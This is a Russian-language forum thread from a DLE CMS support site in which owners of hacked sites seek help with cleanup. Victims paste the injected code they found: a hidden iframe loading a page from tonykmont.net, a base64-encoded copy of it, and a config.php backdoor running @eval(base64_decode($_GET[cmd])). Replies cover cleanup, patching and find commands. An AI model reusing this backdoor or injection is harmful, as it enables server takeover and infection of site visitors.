inspektor 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Собственно вчера обновился до ласт версии. Снес все, оставил только upload и templates - который на локальном компе почистил от файлов .glf (shell) Сегодня опять в папке енжине залит хтаксесс на запуск .glf как php и вставили вверх кода странички ифрейм. !!!проверяю антивирусом встроенным и он не показывает новые файлы неизвестные дистрибьютиву, как с этим бороться? <nofollow><noindex><div style=position:absolute;left:-900px;width:900px><iframe src=http://tonykmont.net/pics/12 width=0 height=0 style=display: none></iframe> Путем изменения шаблона сделал вывод что фрейм вставили не через темплейты. Спецом из дистрибьютива закачал дефолтный шаблон и активировал, ифрем есть - этой операцией я исключил правки файлов шаблона. Далее перезалил папку енджине и не только, ифрем на месте. Есть идеи? Ссылка на сообщение Поделиться на других сайтах
celsoft 6230 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Далее перезалил папку енджине и не только, ифрем на месте. Есть идеи? смотрите файлы настроек в папке engine/data/ при перезаливке дистрибутива они не обновляются. Скорее всего он там у вас шелл. Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Автор Далее перезалил папку енджине и не только, ифрем на месте. Есть идеи? смотрите файлы настроек в папке engine/data/ при перезаливке дистрибутива они не обновляются. Скорее всего он там у вас шелл. действительно, в конфиг.пвп такая фигня. 'lang_&amp;amp;amp;amp;amp;amp;amp;amp;amp;#123;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#036;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#123;@eval(base64_decode(&amp;amp;amp;amp;amp;amp;amp;amp;amp;#036;_GET[cmd]))&amp;amp;amp;amp;amp;amp;amp;amp;amp;#125;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#125;' => "", и в дбконфиг $db = new db; print base64_decode("DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQo8bm9mb2xsb3c+PG5vaW5kZXg+PGRpdiBzdHlsZT1wb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi05MDBweDt3aWR0aDo5MDBweD48aWZyYW1lIHNyYz1odHRwOi8vdG9ueWttb250Lm5ldC9waWNzLzEyIHdpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9ZGlzcGxheTogbm9uZT48L2lmcmFtZT4NCjwvZGl2Pjwvbm9mb2xsb3c+PC9ub2luZGV4Pg=="); что это такое и как с помощью этого можно залить шел? п.с Спасибо, помогло, скажите, а что это за код - да еще в конфиге который появляется первой строкой? Может у меня в папке upload еще шелы лежат, там папок очень много. как можно расшифровать код? Ссылка на сообщение Поделиться на других сайтах
celsoft 6230 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 inspektor, Удалять нужно все, а не расшифровкой заниматься, а изначально у вас проблема возникла потому что вовремя не установили патчи безопасности на свой сервер http://dle-news.ru/bags/Кстати теперь зайдите в админпанель и удалите всех администраторов, кроме себя, у себя смените пароль, также проверьте настройки групп, чтобы не у кого не было доступа к админпанели, кроме вашей группы, также смените пароли на MySQL Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Автор сменил все пароли, проверил права и юзеров. Единственное непонятно почему внутренний антивирь не показал лишний файл .glf Ссылка на сообщение Поделиться на других сайтах
maks1192 96 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Антивирус проверяет файлы с расширением .php Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Несколько дней назад тоже пришлось решить аналогичную проблему с шеллом. Прибила все лишние файлы, нового админа и поправила конфиги, а сегодня получила письмо от Яндекса: На страницах вашего сайта обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных. В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». При переходе на страницу веб-мастера у Яндекса выведен результат: Яндекс проверяет страницы сайта выборочно, поэтому список зараженных страниц может быть неполным. Пожалуйста, проверьте и другие страницы, а также элементы, общие для всех страниц. --- Дата последней проверки: 9.10.2010 Проверяю сайт на вирусы на сервере "бурбона"... результат неутешительный: На странице http://www..... возможно есть вредоносный код! Патчи безопасности все установлены! Help me, please! Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Help me, please! начните с чистки своего компа. потом менять пароли на фтп, базу, удалить все кроме картинок, перезалить файлы скрипта из дистрибутива и в конце концов почитать форум, миллион раз писали. Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Help me, please! начните с чистки своего компа. потом менять пароли на фтп, базу, удалить все кроме картинок, перезалить файлы скрипта из дистрибутива и в конце концов почитать форум, миллион раз писали. Все это произведено и не раз! И пароли поменяла и файлы на ФТП. Комп без вирусов. И? Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 9 октября 2010 Рассказать Опубликовано: 9 октября 2010 Все это произведено и не раз! значит плохо произведено. вы поймите простую вещь, если бы дело было в дле, щас бы тысячи админов выли волками. И пароли поменяла и файлы на ФТП. Комп без вирусов. И? ага, старые песни о главном ну, не можете сами разобраться, наймите нормального админа. Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Слушайте, prikindel! Если Вам говорят, что все пароли изменены (файлы залиты из дистрибутива) сразу же после обнаружения "левых" файлов и админа, это не значит, что только на словах! Не считайте себя самым умным, Вы наш "сильно нормальный"! Ссылка на сообщение Поделиться на других сайтах
Sokolov 0 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 значит плохо произведено. вы поймите простую вещь, если бы дело было в дле, щас бы тысячи админов выли волками. Да они собственно и воют, только дело не в DLE, а как мне кажется в phpMyAdmin, через него и заливали коды прям в базу. Не зря же хостеры несколько недель назад ринулись его обновлять. Hydrargyrum, попробуйте скачать базу, а затем поиском и заменой вычистить код. Он скорее всего у Вас, как и у остальных пострадавших, записан в таблице с полной новостью. Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Не считайте себя самым умным, Вы наш "сильно нормальный"! выпейте валерьянки, дышите глубже и самое главное, включите логику. phpMyAdmin для пхпмайадмина все равно нужен доступ к базе. с другой стороны, если есть доступ к базе, то майадмин вообще не нужен. а обновления - их, по-любому, надо делать всегда своевременно, это ж аксиома. кстати, ты про какой именно баг писал, я пока нашел про dd_ssh, или есть еще какие то? буду признателен. поиском и заменой вычистить код об этом уже писалось, но леди предпочитает не читать форум. Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Автор вообщем сегодня опять залили .hlf я уже незнаю что делать. помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пвп файла. вообщем сегодня опять залили .hlf я уже незнаю что делать. помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пхп файла. Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf? Ссылка на сообщение Поделиться на других сайтах
celsoft 6230 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 для пхпмайадмина все равно нужен доступ к базе. с другой стороны, если есть доступ к базе, то майадмин вообще не нужен. Вы ошибаетесь в сфере недавно найденной уязвимости для MyPHPAdmin там не нужен никакой доступ, можно было легко получать доступ над всем сервером, в том числе и заливать шеллы, при этом не нужно было иметь никаких доступов.вообщем сегодня опять залили .hlf я уже незнаю что делать. помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пвп файла. отправляйте запрос в службу поддержки http://dle-news.ru/index.php?do=feedback предоставляйте доступ к админпанели, и по FTP чтобы проверили ваш сервер и что у вас там стоит. Внимание при проверке будут удалены все сторонние модули и PHP файлы с вашего сервера не имеющие отношения к стандартному скрипту DLEСегодня опять в папке енжине залит хтаксесс на запуск .glf как php и вставили вверх кода странички ифрейм. кстати на эту папку не должно быть никаких прав на запись, значит залит файл либо через FTP или при помощи уязвимого ПО сервера, либо у вас в нарушения всех инструкций по непонятным причинам на папку стоят права на запись Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 в сфере недавно найденной уязвимости неплохо поэтому выше и поинтересовался, dd_ssh или какая то другая ? их там просто достаточно много существует менее или более опасных если в курсе, подскажите название или трэкинг номер какой то Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf? find / -name "*glf" Ссылка на сообщение Поделиться на других сайтах
celsoft 6230 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 поэтому выше и поинтересовался, dd_ssh или какая то другая ? нет, обыкновенная XSS, но очень серьезная, шелы заливаться очень легко и без каких либо доступов, их описания есть на странице http://www.phpmyadmin.net/home_page/security/ Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Автор Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf? find / -name "*glf" спс. Подскажи как сделать поиск только в нужной папке а то начинает шерстить весь сервер и результаты уходят вверх - аж невидно.) Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 find /folder1/folder2/ -name "*glf" Будет искать в папке folder2, а если хочешь видеть по чуть-чуть, то пиши так: find /folder1/folder2/ -name "*glf"|more и когда будешь нажимать "Enter", то будет показывать по чуть-чуть Или же можешь всё найденное сохранить в файл: find /folder1/folder2/ -name "*glf" > /folder1/folder2/123.txt В в файле 123.txt будет всё, что нашло. Ссылка на сообщение Поделиться на других сайтах
Hydrargyrum 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 об этом уже писалось, но леди предпочитает не читать форум. Леди, да будет тебе известно, малыш, нашла и удалила лишний код еще до обращения с вопросом на форум. === По-поводу моей просьбы о помощи.. Извиняюсь, народ, ложное срабатывание.. Яндекс, оказывается, запоздалую статистику выслал.. Вчера запросила новую проверку, сегодня пришло сообщение: Последняя перепроверка сайта не выявила страниц, содержащих вредоносный код. Рано я запаниковала.. Думала, может в базе что-то или в каком-нить файле скрыто (мной пропущено).. По дате был изменен только один файл - dbconfig. Остальные тогда проверила на всякий случай, для успокоения.. Лишний файл (GLF) в папке upload прибила сразу при обнаружении.. В других директориях подобного не обнаружилось.. .htaccess-ы соответствовали оригиналам.. т.е. исправлены не были.. Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 Автор вот спасибо. удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf. 2.celsoft обнаружил еще .glf в папках других сайтов - которые не на дле, прибил, дальше буду смотреть. Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 10 октября 2010 Рассказать Опубликовано: 10 октября 2010 удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf. Сюда могут попадать и файлы и именами: abcglf По этому Вам надо делать такой запрос: find / -name "*.glf" > 1.txt Ссылка на сообщение Поделиться на других сайтах
inspektor 2 Опубликовано: 11 октября 2010 Рассказать Опубликовано: 11 октября 2010 Автор удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf. Сюда могут попадать и файлы и именами: abcglf По этому Вам надо делать такой запрос: find / -name "*.glf" > 1.txt большое человеческое спасибо. Проблема вроде решена, поудалял на всем сервере все глфки, полет пока нормальный. Ссылка на сообщение Поделиться на других сайтах
biggamehunter 0 Опубликовано: 17 октября 2010 Рассказать Опубликовано: 17 октября 2010 Столкнулся по-полной с описанной проблемой ... Вроде вычистил. Только заплатка предлагается с 7.**-й версии, а у меня 6.7 и ниже стоят, нет каких-то способов пофиксить проблему от самопровозглашённых "админов"? http://bestsafari.org Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.